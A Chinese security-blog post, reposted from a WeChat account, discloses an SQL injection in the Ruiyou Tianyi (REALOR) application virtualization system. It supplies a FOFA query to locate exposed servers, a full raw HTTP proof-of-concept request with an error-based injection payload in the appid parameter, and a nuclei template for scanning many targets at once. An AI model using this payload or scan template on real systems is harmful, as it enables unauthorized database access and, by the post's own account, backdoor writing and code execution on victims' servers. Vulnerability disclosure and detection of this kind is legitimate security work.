瑞友天翼应用虚拟化系统appsaveSQL注入

admin

138635
文章

114
评论

2024年5月12日14:21:25评论21 views字数 2206阅读7分21秒阅读模式

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01漏洞描述

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的，具有自主知识产权的基于服务器计算架构的应用虚拟化平台。该系统将用户的各种应用软件集中部署在瑞友天翼服务器（或服务器群）上，客户端可以通过Web快速且安全地访问经过服务器授权的应用软件，实现集中应用、远程接入、协同办公等功能，从而为用户提供一个集中、便捷、安全、高效的虚拟化支持平台。然而，瑞友天翼应用虚拟化系统存在SQL注入漏洞，未经身份验证的远程攻击者可以利用此漏洞在目标系统上执行任意代码（该漏洞涉及通过SQL注入写入后门文件以进行代码执行）。

0x02 漏洞复现

影响版本version < 7.0.5.1fofa语法：app="REALOR-天翼应用虚拟化系统"

瑞友天翼应用虚拟化系统appsaveSQL注入

查看版本：RapAgent.xgi?CMD=GetRegInfo

瑞友天翼应用虚拟化系统appsaveSQL注入

POC:GET /index.php?s=/Admin/appsave&appid=3%27%29+AND+%28SELECT+2590+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766a71%2C%28SELECT+%28ELT%282590%3D2590%2C1%29%29%29%2C0x7162786271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+ITBH HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Izntel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: think_language=zh-CN; PHPSESSID=qlg6b8j8gnd7lbu535e1h3rd02Upgrade-Insecure-Requests: 1

‍

0x03 nuclei批量验证脚本

id: ruiyou_appsave_sqliinfo:  name: ruiyou_appsave_sqli  author: recjl  severity: high  description: 瑞友天翼应用虚拟化系统appsave存在SQL注入漏洞  metadata:       max-request: 1       verified: true       fofa-query: app="REALOR-天翼应用虚拟化系统"  tags: sqli,ruiyou,hwrequests:  - raw:      - |+        GET /index.php?s=/Admin/appsave&appid=3%27%29+AND+%28SELECT+2590+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766a71%2C%28SELECT+%28ELT%282590%3D2590%2C1%29%29%29%2C0x7162786271%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+ITBH HTTP/1.1        Host: {{Hostname}}        Cache-Control: max-age=0        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9        Connection: close    matchers-condition: and    matchers:      - type: word        part: body        words:          - 'qjvjq1qbxbq1'      - type: status        status:          - 404

瑞友天翼应用虚拟化系统appsaveSQL注入

END

点击蓝字关注我们

原文始发于微信公众号（爱喝酒烫头的曹操）：瑞友天翼应用虚拟化系统appsaveSQL注入

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

瑞友天翼应用虚拟化系统appsaveSQL注入

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信